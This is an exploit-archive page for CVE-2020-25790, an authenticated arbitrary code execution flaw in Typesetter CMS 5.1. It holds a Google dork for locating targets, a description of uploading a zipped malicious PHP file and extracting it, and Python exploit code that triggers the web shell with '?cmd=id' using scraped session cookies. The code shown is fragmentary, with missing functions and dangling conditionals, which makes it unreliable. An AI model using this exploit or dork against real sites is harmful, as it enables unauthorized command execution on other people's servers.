Exploits / Vulnerability Discovered : 2020-10-19 |
Type : webapps |
Platform : php
This exploit / vulnerability Typesetter cms 5.1 arbitrary code execution (authenticated) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Typesetter CMS 5.1 - Arbitrary Code Execution
# Exploit Author: Rodolfo "t0gu" Tavares
# Contact: @t0guu (TW)
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: Linux / Apache
# Category: WebApp
# Google Dork: intext:"Powered by Typesetter"
# Date: 2020-09-29
# CVE : CVE-2020-25790
######## Description ########
#
# The CMS Typesetter has functionality (web interface) where it is possible
# through an account with privileges to perform uploads. Through this
# functionality, it is possible to upload a .zip file that contains a
# malicious .php file. In the same functionality, there is also the
# possibility to extract the file through the same web interface, the
# attacker only needs to extract the .zip that was previously loaded and
# click on the malicious .php file to execute commands in the operating
# system.
#
######## Exploit with Poc ########
https://github.com/t0gu/CVE-2020-25790
####### Code #######
# see the poc at https://github.com/t0gu/CVE-2020-25790
import argparse
from bs4 import BeautifulSoup
import requests
import sys
import re
import urllib3
from urllib3.exceptions import InsecureRequestWarning
if cookie_name == None or cookie_name == "":
if cookie_value == None or cookie_value == "":
print("==> Something went wrong while login")
else:
data = f"{cookie_name}={cookie_value};"
return data
except (requests.exceptions.Timeout, requests.exceptions.BaseHTTPError) as e:
print(f'==> Error while login {e}')
def xpl(self, auth_cookie, name_file):
try:
url = self.url + "/data/_uploaded/file/" + name_file + "?cmd=id"
new_url = url.replace("index.php", "")
print(f"==> Try to exploit: {new_url}")
r = requests.get(url=new_url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
pattern = r'<pre>(.*?)</pre>'
m = re.search(pattern, r.text.replace("\n", ""))
if m is not None and m != "":
print(f"==> Vulnerable: {m.group(1)}")
except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
print(f'==> Error {e}')
def get_verified(self):
try:
url = self.url + "/Admin/Uploaded"
auth_cookie = self.get_cookies()
r = requests.get(url=url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
data = r.text
pattern_regex = r'"verified":"(.*)"}'
m = re.search(pattern_regex, data)
if m is not None or m != "":
return m.group(1)
except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
print(f'==> Error {e}')